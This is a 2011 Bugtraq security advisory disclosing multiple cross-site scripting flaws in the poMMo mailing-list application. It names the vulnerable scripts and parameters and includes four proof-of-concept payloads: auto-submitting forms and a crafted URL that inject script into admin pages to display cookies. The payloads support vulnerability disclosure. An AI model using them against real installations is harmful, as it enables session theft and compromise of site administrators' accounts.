[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
HTB22976: Multiple XSS (Cross Site Scripting) vulnerabilities in poMMo
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: HTB22976: Multiple XSS (Cross Site Scripting) vulnerabilities in poMMo
- From: advisory@xxxxxxxxxxx
- Date: Tue, 10 May 2011 09:11:39 +0200 (CEST)
Vulnerability ID: HTB22976
Reference:
http://www.htbridge.ch/advisory/multiple_xss_cross_site_scripting_vulnerabilities_in_pommo.html
Product: poMMo
Vendor: Brice Burgess ( http://pommo.org/ )
Vulnerable Version: Aardvark PR16.1
Vendor Notification: 26 April 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab (
http://www.htbridge.ch/advisory/ )
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerabilities exists due to failure in the
"admin/setup/config/general.php", "index.php",
"admin/subscribers/subscribers_groups.php", "admin/setup/setup_fields.php"
scripts to properly sanitize user-supplied input in "site_name", "referer",
"group_name" and "field_name" variables. Successful exploitation of this
vulnerability could result in a compromise of the application, theft of
cookie-based authentication credentials, disclosure or modification of
sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is
available:
1.
<form action="http://host/admin/setup/config/general.php" method="post"
name="main">
<input type="hidden" name="list_name" value="Mailing List">
<input type="hidden" name="site_name"
value='poMMo"><script>alert(document.cookie)</script>'>
<input type="hidden" name="site_name" value="poMMo Website">
<input type="hidden" name="site_url" value="http://www.example.com/">
<input type="hidden" name="site_success" value="">
<input type="hidden" name="site_confirm" value="">
<input type="hidden" name="list_confirm" value="on">
<input type="hidden" name="list_exchanger" value="mail">
</form>
<script>
document.main.submit();
</script>
2.
http://host/index.php?referer=1"><script>alert(document.cookie)</script>
3.
<form action="http://host/admin/subscribers/subscribers_groups.php"
method="post" name="main">
<input type="hidden" name="group_name
value='group"><script>alert("XSS")</script>'>
</form>
<script>
document.main.submit();
</script>
4.
<form action="http://host/admin/setup/setup_fields.php" method="post"
name="main">
<input type="hidden" name="field_name"
value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="field_type" value="text">
</form>
<script>
document.main.submit();
</script>